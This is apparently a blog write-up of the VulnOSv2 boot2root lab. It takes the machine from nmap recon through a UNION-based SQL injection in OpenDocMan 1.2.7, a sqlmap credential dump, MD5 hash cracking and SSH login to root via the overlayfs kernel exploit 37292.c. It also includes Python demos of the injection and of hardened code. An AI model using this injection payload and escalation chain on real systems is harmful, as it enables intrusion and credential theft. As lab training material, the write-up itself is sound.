30 March 2023

Pentesting Fun Stuff

following the cyber security path…

VulnOSv2

This is another boot2root from my OSCP list hosted by vulnhub.com and TryHackMe.com.
The challenge is as follows: “Your assignment is to pentest a company website, get root of the system and read the final flag”
So let’s get cracking.

Converting

This VM was created in VirtualBox and exported as a .vdi disk image.
I use VMware, and VMware doesn't work with .vdi files. So what to do, short of installing VirtualBox?

Here is how:

First I install qemu-img, which comes with the qemu-utils package:

root@redteam:~# apt install qemu-utils qemu-block-extra -y

Then I download the VM from vulnhub.com and extract the 7z file.

root@redteam:~/Downloads# 7z x VulnOSv2.7z 

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz (406E3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 799933398 bytes (763 MiB)

Extracting archive: VulnOSv2.7z
--
Path = VulnOSv2.7z
Type = 7z
Physical Size = 799933398
Headers Size = 240
Method = LZMA:25 BCJ
Solid = +
Blocks = 2

Everything is Ok              

Folders: 1
Files: 3
Size:       2998942644
Compressed: 799933398

When that is done, run the following command to convert the .vdi file to a .vmdk file:

root@redteam:~/Downloads/VulnOSv2# qemu-img convert -f vdi -O vmdk VulnOSv2.vdi VulnOSv2.vmdk
root@redteam:~/Downloads/VulnOSv2# ls
VulnOSv2.vbox  VulnOSv2.vbox-prev  VulnOSv2.vdi  VulnOSv2.vmdk

And there you have it. Now you can create a new VM in VMware and replace the HDD with this vmdk.

OK, now that the VM runs in VMware I can start.

Recon

Starting with an nmap scan.

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
|   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|   256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
|_  256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open  irc     ngircd
MAC Address: 00:0C:29:83:0D:CE (VMware)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap found the following ports/services:

  • SSH server running on port 22, version 6.6.1p1
  • Apache HTTP server, version 2.4.7
  • IRC server

Nmap also thinks it runs on Ubuntu.

SSH ~ first try

There are newer versions, but this one doesn’t look like it’s vulnerable.

root@redteam:~/Downloads/VulnOSv2# ssh 192.168.50.138
The authenticity of host '192.168.50.138 (192.168.50.138)' can't be established.
ECDSA key fingerprint is SHA256:nIyyJRPJMy1g6F5m8AIT7W//x6lj3ZqhUbYuvSafKeI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.50.138' (ECDSA) to the list of known hosts.
root@192.168.50.138's password:

Also there is no banner, which sometimes gives useful information.

HTTP

When browsing to the IP address I get the same information as in the description on vulnhub.com.
There is also a link to the main webpage of the mentioned company.

At the bottom of the page there is a footer: 2019 © Vulnerable since 1980
That's a nice statement, and it also leads me to believe the IRC server is the real culprit here… but first things first.
Also the favicon is that of Drupal. Maybe there is a login page and it's more than just a static site.

On the Documentation page there is a nifty piece of security.

Looks like there is nothing… but then

Like I said… nifty security. Of course this text is visible in the source code, but this was more fun to show.
So let's take a look at /jabcd0cs/.

When visiting this page I get a login form and a software name plus version: OpenDocMan v1.2.7.

root@redteam:~/Downloads/VulnOSv2# searchsploit opendocman 1.2.7
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenDocMan 1.2.7 - Multiple Vulnerabilities                                                                                                                               | exploits/php/webapps/32075.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

The vulnerabilities are:

  • SQL Injection
  • Improper Access Control

I try the SQL injection first. The vulnerability lies in the missing validation of the add_value parameter.

http://192.168.50.138/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1
Host: 192.168.50.138
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SpryMedia_DataTables_filetable_out.php=%7B%22iCreate%22%3A1559305767887%2C%22iStart%22%3A0%2C%22iEnd%22%3A6%2C%22iLength%22%3A10%2C%22sFilter%22%3A%22%22%2C%22sFilterEsc%22%3Atrue%2C%22aaSorting%22%3A%5B%20%5B0%2C%22asc%22%5D%5D%2C%22aaSearchCols%22%3A%5B%20%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%5D%2C%22abVisCols%22%3A%5B%20true%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%5D%7D; has_js=1; PHPSESSID=p5okl28r5bjd8o60sleb0n4ds4
Connection: close
Upgrade-Insecure-Requests: 1

With Burp I captured the full HTTP request so I can run it through sqlmap.

When injecting the URL parameter I can retrieve the current user under which this program runs.

In other words, this software runs as root on the local system. Never a good idea, because once you compromise the program you immediately compromise the system at root level.
For now I would like to get the username/password table. For this task I use sqlmap.
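The injection works because add_value is spliced into the query text as a table name, so a UNION can be appended to it. The following is an added illustration, not OpenDocMan's code: a simplified Python/sqlite3 model of a lookup of that shape beside a hardened version that allowlists the identifier and binds the id. The two-column schema, the odm_udf table name and the payload are constructed for this demo.

```python
import sqlite3

# Constructed sample data standing in for the odm_user table seen on the page;
# the column layout and the odm_udf table are assumed, not OpenDocMan's schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE odm_user (id INTEGER, username TEXT, password TEXT);
        INSERT INTO odm_user VALUES (1, 'guest',  '084e0343a0486ff05530df6c705c8bb4');
        INSERT INTO odm_user VALUES (2, 'webmin', 'b78aae356709f8c31118ea613980954b');
        CREATE TABLE odm_udf (id INTEGER, name TEXT);
        INSERT INTO odm_udf VALUES (1, 'department');
    """)
    return db

def lookup_vulnerable(db, add_value, q):
    # Assumed shape of the bug: both request parameters are pasted into the SQL
    # text, so add_value can close the FROM clause and append its own UNION.
    sql = f"SELECT id, name FROM {add_value} WHERE id = {q}"
    return db.execute(sql).fetchall()

# The only table this lookup should ever read (assumed name).
ALLOWED_TABLES = {"odm_udf"}

def lookup_hardened(db, add_value, q):
    # A table name cannot be bound as a parameter, so it is checked against an
    # allowlist; the id is bound with a placeholder instead of interpolated.
    if add_value not in ALLOWED_TABLES:
        raise ValueError("unexpected table name: %r" % add_value)
    if not q.isdigit():
        raise ValueError("id must be numeric")
    sql = f"SELECT id, name FROM {add_value} WHERE id = ?"
    return db.execute(sql, (int(q),)).fetchall()

# Constructed payload in the spirit of the page's UNION SELECT: the column count
# must match the original SELECT (two here, nine in the real ajax_udf query).
PAYLOAD = "odm_udf WHERE 0 UNION SELECT username, password FROM odm_user --"

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, PAYLOAD, "1"))  # leaks usernames and hashes
    try:
        lookup_hardened(db, PAYLOAD, "1")
    except ValueError as err:
        print("rejected:", err)
    print(lookup_hardened(db, "odm_udf", "1"))  # [(1, 'department')]
```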

After it ran, I found the usernames in the jabcd0cs database:

Database: jabcd0cs
Table: odm_user
[3 entries]
+----------+
| username |
+----------+
| guest    |
| n0w4n    |
| webmin   |
+----------+

The passwords were stored as hashes, and only two of them were recovered to their plaintext strings:

Database: jabcd0cs                                                                                     
Table: odm_user
[3 entries]
+------------------------------------------+
| password                                 |
+------------------------------------------+
| 084e0343a0486ff05530df6c705c8bb4 (guest) |
| 1a1dc91c907325c69271ddf0c944bc72 (pass)  |
| b78aae356709f8c31118ea613980954b         |
+------------------------------------------+

There is a nice Python script on GitHub, Hash-Buster, that can help you when you're stuck with a hash.

root@redteam:~/Hash-Buster# python3 hash.py -s b78aae356709f8c31118ea613980954b
_  _ ____ ____ _  _    ___  _  _ ____ ___ ____ ____
|__| |__| [__  |__|    |__] |  | [__   |  |___ |__/
|  | |  | ___] |  |    |__] |__| ___]  |  |___ |  \  v3.0

[!] Hash function : MD5
webmin1980

And there is the joke of the footer found earlier.
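Why the lookup was this easy: the hashes are unsalted MD5, so a single precomputed table serves every user in the database. The following is an added example, not Hash-Buster's code: it checks the three hashes from the sqlmap output against a small constructed candidate list, and shows the salted, stretched storage that makes such a shared table useless. The candidate list and the PBKDF2 parameters are assumptions.

```python
import hashlib
import hmac
import os

# The three password hashes from the sqlmap output above.
STORED_HASHES = [
    "084e0343a0486ff05530df6c705c8bb4",
    "1a1dc91c907325c69271ddf0c944bc72",
    "b78aae356709f8c31118ea613980954b",
]

# Constructed candidate list; a real audit would use a proper wordlist.
CANDIDATES = ["guest", "pass", "password", "webmin", "webmin1980", "admin"]

def looks_like_unsalted_md5(h):
    # 32 lowercase hex characters with no scheme prefix or salt field is the
    # telltale of a raw MD5 password hash.
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h)

def build_md5_table(candidates):
    # Without salts one precomputed table serves every user in the database.
    return {hashlib.md5(c.encode()).hexdigest(): c for c in candidates}

def recover_unsalted(hashes, candidates):
    # Returns hash -> plaintext (None when the candidate list has no match).
    table = build_md5_table(candidates)
    return {h: table.get(h) for h in hashes if looks_like_unsalted_md5(h)}

def pbkdf2_store(password, salt=None, iterations=200_000):
    # What the table should have held: a per-user random salt plus key
    # stretching, so no lookup table can be shared across users.
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def pbkdf2_verify(stored, password):
    _scheme, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    for h, plain in recover_unsalted(STORED_HASHES, CANDIDATES).items():
        print(h, "->", plain)
    stored = pbkdf2_store("guest")
    print(stored, pbkdf2_verify(stored, "guest"))
```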

SSH ~ second try

root@redteam:~# ssh webmin@192.168.50.138
webmin@192.168.50.138's password: 
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri May 31 15:33:28 CEST 2019

  System load: 0.0               Memory usage: 4%   Processes:       65
  Usage of /:  5.7% of 29.91GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May  4 10:41:07 2016
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)

Now for some system recon.

$ python -c 'import pty;pty.spawn("/bin/bash");'
webmin@VulnOSv2:~$ pwd
/home/webmin
webmin@VulnOSv2:~$ ls -lah
total 596K
drwxr-x--- 3 webmin webmin 4.0K May  3  2016 .
drwxr-xr-x 4 root   root   4.0K Apr 16  2016 ..
-rw------- 1 webmin webmin   85 May  4  2016 .bash_history
-rw-r--r-- 1 webmin webmin  220 Apr  9  2014 .bash_logout
-rw-r--r-- 1 webmin webmin 3.6K Apr  9  2014 .bashrc
drwx------ 2 webmin webmin 4.0K Apr 30  2016 .cache
-rw-rw-r-- 1 webmin webmin 566K Apr 30  2016 post.tar.gz
-rw-r--r-- 1 webmin webmin  675 Apr  9  2014 .profile

In the user's home folder there is a tarball. To get it onto my system I start a Python HTTP server on the target (Python is installed there),
then fetch the file with curl and pipe it straight into tar to extract the contents.

It looks like the files needed to run hydra. Not very useful at the moment.
For a faster scan of the system I use a recon bash script called LinEnum.

webmin@VulnOSv2:~$ uname -r
3.13.0-24-generic
webmin@VulnOSv2:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"
NAME="Ubuntu"
VERSION="14.04.4 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.4 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

Looks like an old kernel, which probably has some vulnerabilities.

root@redteam:~# searchsploit kernel 3.13
--------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                 |  Path
                                                               | (/usr/share/exploitdb/)
--------------------------------------------------------------- ----------------------------------------
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Deni | exploits/osx/dos/8264.c
Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory  | exploits/osx/dos/8263.c
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overf | exploits/osx/dos/8262.c
Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial | exploits/multiple/dos/5191.c
Linux Kernel 3.13 - SGID Privilege Escalation                  | exploits/linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) -  | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) -  | exploits/linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (M | exploits/linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local | exploits/linux/dos/36743.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X | exploits/linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Ar | exploits/linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)          | exploits/linux/dos/31305.c
--------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Because of the kernel version and the OS being Ubuntu, there is a good chance the overlayfs exploit works here.
To exploit it I copy 37292.c to the remote system and compile it.

webmin@VulnOSv2:/tmp$ gcc kernel.c -o kernel
webmin@VulnOSv2:/tmp$ ls -lah
total 28K
drwxrwxrwx  2 root   root   4.0K May 31 15:41 .
drwxr-xr-x 21 root   root   4.0K Apr  3  2016 ..
-rwxrwxr-x  1 webmin webmin  12K May 31 15:41 kernel
-rw-rw-r--  1 webmin webmin 5.0K May 31 15:38 kernel.c
webmin@VulnOSv2:/tmp$ ./kernel
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)

After compiling and running the program I got my privileges escalated to root. Now for the flag.

# cd /root
# ls
flag.txt
# cat flag.txt	
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

Conclusion

This was a fun challenge to try.
I don't have any more challenges from the VulnOS series in my list, but I think I'll definitely give another one a shot.
